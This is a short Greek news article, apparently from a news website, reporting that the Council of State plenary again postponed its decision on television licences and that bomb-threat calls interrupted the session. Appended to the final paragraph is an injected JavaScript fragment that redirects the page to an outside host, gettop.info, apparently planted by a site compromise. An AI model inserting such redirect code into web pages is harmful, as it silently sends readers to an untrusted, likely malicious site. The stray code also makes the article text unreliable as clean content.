Ούτε σήμερα απόφαση του ΣτΕ για τις τηλεοπτικές άδειες

0
6

 

Η Ολομέλεια του Συμβουλίου της Επικρατείας διέκοψε τη σημερινή, κεκλεισμένων των θυρών, διάσκεψη για το θέμα των τηλεοπτικών αδειών.

Οι σύμβουλοι Επικρατείας δεν ολοκλήρωσαν το πρώτο στάδιο της διαδικασίας που αφορά το έννομο συμφέρον και το παραδεκτό των τηλεοπτικών σταθμών και ούτε προχώρησαν σε ψηφοφορία για τα δυο θέματα.

Κατά τη σημερινή διαδικασία δόθηκε μάχη επιχειρημάτων σχετικά με το παραδεκτό ή όχι των προσφυγών. Δικαστικές πήγες ανέφεραν ότι ο πρόεδρος Νίκος Σακελλαρίου θα ενημερώσει τα μέλη της Ολομέλειας για το πότε θα γίνει η επόμενη διάσκεψη.

Πρέπει να σημειωθεί ότι η Ολομέλεια του ΣτΕ θα επανέλθει,έτσι κι αλλιώς, στις 13 Ιανουαρίου για να κρίνει  τις νέες προσφυγές των τηλεοπτικών σταθμών, που αφορούν όχι τη συνταγματικό τητα του νόμου Παππά, αλλά την προκήρυξη του διαγωνισμού.

Νωρίτερα, δύο απειλητικά τηλεφωνήματα για τοποθέτηση βόμβας οδήγησαν στη διακοπή της συνεδρίασης.

Το πρώτο τηλεφώνημα έγινε στις 10:07 στο ΒΗΜΑ και το δεύτερο στις 10.09 στην «Εφημερίδα των Συντακτών» με τον άγνωστο να λέει πως η βόμβα θα εκραγεί «σε 45 λεπτά». «Δεν είναι αστείο, κινδυνεύουν ζωές».

Γύρω στις 9:30 είχε ξεκινήσει η δεύτερη και καθοριστική διάσκεψη της διευρυμένης Ολομέλειας, με θέμα το πρώτο στάδιο των νομικών ζητημάτων που έχουν τεθεί για το θέμα των τηλεοπτικών αδειών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here